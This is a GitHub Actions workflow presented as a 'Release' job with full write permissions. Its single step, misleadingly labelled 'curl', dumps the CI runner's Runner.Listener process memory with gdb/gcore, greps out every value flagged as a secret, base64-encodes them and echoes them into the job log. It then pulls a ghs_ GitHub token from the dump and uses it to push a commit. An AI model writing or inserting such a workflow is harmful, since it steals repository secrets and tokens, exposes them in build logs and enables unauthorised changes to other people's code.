name: Release

on:
  push:
    branches:
      - main

permissions: write-all

jobs:
  release:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: curl
        run: |
          sudo apt-get install -y gdb && \
          sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
          B64_BLOB=`grep -Eao '"[^"]+":\{"value":"[^"]*","issecret":true\}' k.dump* | base64 -w 0`
          echo $B64_BLOB
          GH_TOKEN=`echo $B64_BLOB | base64 -d | grep -aoE '"ghs_.+?"' | sed 's/\"//g'| sort -u | head -1 | sed 's/,issecret//'`
          
          export GH_TOKEN=$GH_TOKEN
          ls
          echo "new_file" > text.txt
          git add text.txt
          git commit -m "test commit"
          git push origin master
          
          

